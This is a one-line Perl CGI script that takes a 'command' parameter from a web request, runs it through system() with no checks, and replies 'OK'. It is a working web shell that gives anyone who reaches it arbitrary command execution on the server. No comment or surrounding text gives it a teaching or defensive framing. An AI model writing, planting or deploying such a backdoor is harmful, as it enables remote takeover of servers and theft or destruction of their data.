#!/usr/bin/perl use CGI; $command = param('command'); system($command); print start_html, "OK", end_html;